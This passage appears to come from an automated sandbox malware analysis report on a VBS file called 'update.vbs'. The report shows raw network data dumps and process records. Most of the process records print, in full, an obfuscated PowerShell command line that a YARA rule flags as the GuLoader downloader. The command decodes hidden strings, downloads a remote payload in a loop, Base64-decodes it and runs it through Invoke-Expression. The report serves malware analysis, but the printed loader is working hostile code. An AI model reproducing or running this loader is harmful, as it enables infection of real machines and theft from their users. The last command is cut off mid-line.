                                        2024-05-23 16:25:48 UTC16384INData Raw: c4 85 26 9d d0 35 3d fa 2c 12 5b 0b 25 c2 43 9f 14 ad 2c 3c d9 22 87 14 4a ba 73 11 b6 3f 8a 8a f7 fa 4f ba 76 68 1c fe bd 90 ff a2 59 f3 b9 e0 f3 3d 3e c5 c0 86 8b e0 24 ad 48 db bf 8b 9d f8 2e c5 44 2d 9c 81 ee 73 e6 88 be a2 62 4b d9 0b 4d a0 d1 5a 56 b8 a7 98 0d 74 92 17 ca 1b 5c ef d6 2f d8 9c fe a2 89 6d 4e 8b de df ad 48 6e 56 2a dd 9f 74 68 3d 90 75 10 6b 82 bd 41 eb bb 56 dd 07 3c 74 f8 42 da 43 c4 2b e2 59 e4 f8 a9 f3 ed 95 e8 82 73 3b 0e 25 1e cf 58 12 35 ca c7 68 79 36 56 0f f5 50 ce 74 b5 50 88 d6 df 29 e1 78 14 8d f0 85 d4 16 d8 8a 95 b4 44 b8 17 cf b9 75 89 fd ce c9 fe 6d ce 1f b2 1b ad 3a d8 6b 08 99 46 0b db 48 4d 22 75 f7 0e 2f b7 52 fe 0d 5d 7c f5 2c 88 e6 e6 d1 33 f6 26 7f f7 e8 ac 52 5e 2a 6b f1 91 62 20 62 6b de 4b 93 40 89 46 65 10
                                        Data Ascii: &5=,[%C,<"Js?OvhY=>$H.D-sbKMZVt\/mNHnV*th=ukAV<tBC+Ys;%X5hy6VPtP)xDum:kFHM"u/R]|,3&R^*kb bkK@Fe
                                        2024-05-23 16:25:48 UTC16384INData Raw: 5d 41 73 e5 58 0c f3 93 fe 5d 71 6a 6b 79 18 17 9d 87 92 33 4a 36 f7 a5 07 db e7 b9 42 26 7a e5 91 93 9e dd f8 d5 0d da 72 9d 7f b0 9d 85 a0 d5 54 39 c6 6c 7c e7 9d 12 2f 22 16 68 48 30 91 80 38 cf 0c 50 c9 97 05 e7 d0 e7 d7 8c ac 33 1e c3 bd 2c ca bd bd 99 7f e0 5e c0 c1 c8 76 df bf 3f 70 74 cf 41 7a 9c 4d 92 be 9d d1 6c 20 24 db 9a 9c c7 19 c0 88 d3 b9 54 f0 10 63 a8 d6 35 4e 51 5e 59 59 78 a9 f4 2b 5c 19 ad c3 b6 85 e2 32 9b c9 65 b0 98 0c af 12 de d6 df 00 f1 45 94 00 9c 4c 04 35 5f e0 ee 5b 3f fe 2e 77 7c 11 22 37 d9 40 4f 0e ad e6 08 4f 71 97 bb c2 2b 7f 75 a0 e8 5c 74 54 55 c9 c3 92 b8 ab 8a 90 ca 61 ce df e2 c5 92 f0 74 14 73 1d 42 de 07 6a 8f 2e b6 63 02 8a dd dd 2c db fc 38 39 84 f3 21 de 3c 60 7f 1c d0 af 0e 9d 85 19 93 a3 88 82 84 ce 61 80 fb
                                        Data Ascii: ]AsX]qjky3J6B&zrT9l|/"hH08P3,^v?ptAzMl $Tc5NQ^YYx+\2eEL5_[?.w|"7@OOq+u\tTUatsBj.c,89!<`a
                                        2024-05-23 16:25:48 UTC16384INData Raw: 66 14 2c 1c b6 51 2d be 20 f9 a6 45 4d 7a 1c c6 ac 3c 8f d0 bc c5 49 e2 bc e3 77 45 5a 8d 82 ff d7 ec 85 47 fc c0 ab 91 12 f5 d5 60 9a a5 c6 0c c4 06 a8 60 b9 4c 98 1b f6 25 a7 ba d6 db e8 bc ec c3 34 84 a9 58 fb 1d cc c1 1d 0b 00 0e 54 b3 32 51 13 18 fd e0 4c 01 4e 33 79 29 eb 6e 34 31 5b 4f b0 cf 58 f4 5b 50 e1 c9 a4 35 1c 2d be 41 b2 e4 e6 b8 54 45 96 3a f5 d4 e3 d2 41 fb a9 53 28 eb c2 74 89 3a 87 45 ac 3c 49 4f 61 62 3e 79 c1 9c 08 87 f9 62 62 7d 71 d7 32 7b 4f f5 9d 9c 83 66 a2 a8 da 97 f1 e3 d2 c1 df 6a 6a 68 8f d2 5c 2e 41 ce d2 f1 b6 e4 90 e7 81 a2 3e da e6 d1 39 b5 bd 68 48 f6 a6 6c 48 9b 22 f4 34 4f 0e d5 c4 c2 e3 b2 94 72 e6 f5 ac a7 ee e5 ad fc e7 57 67 b5 03 5e b0 59 18 b9 db d4 59 a4 a3 fc 9d b8 13 b9 b0 db a7 b3 98 da 08 40 89 d4 c4 1f de
                                        Data Ascii: f,Q- EMz<IwEZG``L%4XT2QLN3y)n41[OX[P5-ATE:AS(t:E<IOab>ybb}q2{Ofjjh\.A>9hHlH"4OrWg^YY@
                                        2024-05-23 16:25:48 UTC16384INData Raw: c5 be b9 fd 40 9d 03 cc 83 9b bc 21 b9 ce 4d 87 d2 e8 21 9f 8c 1b 71 7b 35 e8 bf 75 27 ba e4 72 df f6 56 20 64 d8 c3 0e b5 2b 4d a7 ae 83 47 c3 2f 31 e7 69 47 05 56 6a 88 19 de 9a 6c 68 5f b2 0f c1 c3 b4 9e 5e 64 fe 61 47 5c bd 4a 88 24 f5 98 27 cf 21 34 d8 e6 f9 ad e2 a2 a3 08 ac da a7 c1 2e 6c b7 c0 6a 27 01 72 ca bc 62 f4 a7 e9 34 af 19 4a 08 93 c5 23 be 80 c0 77 cb 2e 9e 29 97 6b 49 44 8c 2a 0b 65 bf 89 e5 60 1e 13 cc e3 eb 21 c7 78 13 ee 75 3c bb ea 49 c1 9e 24 98 d3 98 d8 ed 81 ce 47 b7 8c 4d 09 07 a1 94 c9 f8 33 69 19 da a0 76 7c aa 9f fc d2 22 e3 ce e7 e6 a6 87 c9 d2 97 39 41 09 70 34 d1 f7 14 73 95 2c 05 6b 97 df cd 6a 66 7d 9e 10 c8 fa f0 05 47 84 68 6c 3f 2c 42 85 75 5c 15 ae 93 1e 59 58 33 32 53 5c a0 41 ad 44 b6 8c 0f 79 e6 17 8f 22 03 99 29
                                        Data Ascii: @!M!q{5u'rV d+MG/1iGVjlh_^daG\J$'!4.lj'rb4J#w.)kID*e`!xu<I$GM3iv|"9Ap4s,kjf}Ghl?,Bu\YX32S\ADy")
                                        2024-05-23 16:25:48 UTC16384INData Raw: 6c 9d cc 50 68 ce f3 ec 7a a6 dd 35 a7 27 d3 6d a1 2b a4 3c fc 47 2e a8 d8 b3 c1 af 62 94 b4 ff 22 7f 63 1f db 9c aa 37 d6 b4 63 81 44 c9 0e 8c fb 39 bd 99 78 a0 11 b3 90 58 61 1c 88 8c 92 e4 be cf 27 14 cd f4 c6 3a 18 7f ce 56 17 87 aa ff 45 31 ec 0d 1c af c8 e8 a6 cd 4e b5 7e 48 e0 8b b1 07 9f 70 8f a5 c3 c9 3b 1a 90 00 e3 87 5a e0 a9 71 e6 b4 96 40 56 45 6a db 70 59 99 c6 60 08 6b a2 43 5b 86 9f 10 1b 5f 13 30 92 bd 65 7c e1 cf 45 53 0f 7b 57 66 39 da 29 d8 b7 cc 1c 0c 34 bb c9 69 76 88 0f 80 e5 3e 45 2f 94 dc 0d cb d7 79 1d 5c b2 52 64 2b 0e 1e 17 69 f3 bb 46 b7 d2 a3 12 84 03 c7 c1 3a 79 81 3e cd c5 85 63 0a 5c 49 93 99 6d ac c3 94 61 c2 70 8c 31 9d 89 99 7c 87 64 b5 c2 fe 8b 02 e1 b2 24 f9 ee 3d f3 c9 3b 6c 1c a6 bc c6 7a be 7c a7 5c ad 2a 77 5f 9d
                                        Data Ascii: lPhz5'm+<G.b"c7cD9xXa':VE1N~Hp;Zq@VEjpY`kC[_0e|ES{Wf9)4iv>E/y\Rd+iF:y>c\Imap1|d$=;lz|\*w_
                                        2024-05-23 16:25:48 UTC16384INData Raw: ec 77 7a f6 bc da 5c a1 5a 32 2d cc ba 23 53 27 9d 2a 9f 9d b6 d1 21 b5 e2 fa 48 f6 a8 ed 90 7a ed 27 30 f8 87 19 ac 8a 6a 8e 92 99 9b c6 fd af cc 15 bd cd 70 58 2f be fb 5e 99 d9 19 b9 ee da 79 e0 90 54 7b f8 b0 e4 f9 01 4f eb 7e d4 1f 55 4f f4 ae 74 5d f8 3a a3 1b 04 43 11 fb f3 41 d2 4d 14 3b 40 ca 09 2a bb 3b 37 6d 2c 06 05 19 f8 cb 44 72 01 65 ec 38 89 a5 61 af d6 94 e9 26 69 23 cb 99 72 5d 00 a5 0e 88 e7 8c 62 3e ee 08 67 8f 3a 4e f1 b0 5d 18 4b d7 5a 09 f9 ab b2 9e fd 5d 9e 4a f9 18 36 b9 39 3e 38 52 1d 8b ec d3 b2 b1 db 83 5e b3 1e 4a 7a 27 48 d7 10 b7 5a db 2b af 71 ae 2e 87 3f ad ba eb 11 1d 02 f7 25 7b f2 78 d3 9b c3 95 3a 6a 1f 7f 18 ed f8 ec 2b 24 5f 5a 4d 7e 30 61 73 77 74 9f 39 e2 06 6c 11 d5 10 91 01 4d 8d b7 3b 94 66 e7 3d 77 d1 79 a8 ae
                                        Data Ascii: wz\Z2-#S'*!Hz'0jpX/^yT{O~UOt]:CAM;@*;7m,Dre8a&i#r]b>g:N]KZ]J69>8R^Jz'HZ+q.?%{x:j+$_ZM~0aswt9lM;f=wy
                                        2024-05-23 16:25:48 UTC16384INData Raw: 25 5d 45 a8 fc a9 03 7b 45 02 04 d8 59 fc d2 16 c6 43 60 e7 6a 80 55 d6 b6 ce a1 1d 70 19 d0 dc 12 4b 95 18 0b 59 0b b3 39 22 dc f8 d3 36 a4 fa bb 71 bb ba 03 18 35 cb 3e 6f 00 12 71 b0 13 1e 59 0f da de 01 5a f0 a5 52 30 92 c4 6c 19 47 62 ab 8d 2f e6 50 f3 cc ed 09 6b 63 ac 4e c9 8b 06 c6 67 44 d6 05 57 0f 19 14 57 18 b6 dc 14 4d 0f ef 4e 41 8c a5 7a fc 15 95 de f9 b7 92 a8 55 f4 73 50 2a f1 5f 5f ff d7 68 43 ff 44 b1 5b 22 25 1e da 89 5a 03 49 d4 f6 d0 3b 73 ae 50 6a dd 44 fc 22 c0 e3 03 1e a5 83 28 30 23 da a4 0b 1e 1c d5 8c 33 20 cb 5f 4a 66 d8 82 de d9 14 75 06 d7 7e de d0 33 d2 64 ed db 04 37 fe a7 71 55 d5 db a1 da 6f ae ec 55 bd 68 0b cd 6f eb 34 06 dc 4b 24 40 a7 40 6a a1 86 5c 8a 3f c8 05 12 7a 3b bb 14 3c 00 b3 dd 82 c6 2c 20 a0 c5 38 f9 dd 87
                                        Data Ascii: %]E{EYC`jUpKY9"6q5>oqYZR0lGb/PkcNgDWWMNAzUsP*__hCD["%ZI;sPjD"(0#3 _Jfu~3d7qUoUho4K$@@j\?z;<, 8
                                        2024-05-23 16:25:48 UTC16384INData Raw: d4 4c 22 93 57 b9 36 4b 86 cb 07 b8 64 a0 ba 64 83 76 40 31 09 5e 31 77 d6 b9 00 c7 22 90 01 1d 35 3a 0f 14 ee dd 63 3c 5f a5 13 76 0d 25 49 37 96 fc 69 d4 c3 26 74 00 bc 3f 9e bf cd 4d b4 91 b7 e0 77 e0 e9 9f db e3 59 43 c9 0c 8e 7c e3 28 6f a3 6c 95 d3 c4 6e 4c 1f db 52 8f 47 ae d4 97 63 79 3a 30 09 88 02 47 12 1f 17 b1 d8 b9 f2 08 90 de 47 85 7e 42 e1 89 f6 30 40 6b 3c 8c 81 aa 64 40 b3 3a 34 bd 99 29 4f 70 61 62 ab 89 c3 93 cb 49 ab fa bc a3 a0 e6 1c 73 87 a8 ef ad 09 37 3d b2 69 07 84 8e 6f 12 6a b1 c7 11 ee 94 91 dd 71 ac 7f 35 d1 15 58 7a c7 c8 5d 5a 12 35 47 c8 07 99 c3 3f 6d 99 39 8f e1 80 2b 6c e5 b7 c3 01 e8 45 e8 93 7a e9 5d ba 01 5a 5c 3c 29 9a 44 93 9f 2b 38 7e a8 c5 84 ec e7 1b 8d 89 19 26 f0 ef 8c 0e 77 39 5c 49 74 9d 7b bd bf 2b b8 c6 6f
                                        Data Ascii: L"W6Kddv@1^1w"5:c<_v%I7i&t?MwYC|(olnLRGcy:0GG~B0@k<d@:4)OpabIs7=iojq5Xz]Z5G?m9+lEz]Z\<)D+8~&w9\It{+o


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:12:24:55
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs"
                                        Imagebase:0x7ff71ea70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:12:25:02
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:12:25:02
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:12:25:04
                                        Start date:23/05/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
                                        Imagebase:0x7ff61d6d0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:12:25:12
                                        Start date:23/05/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I 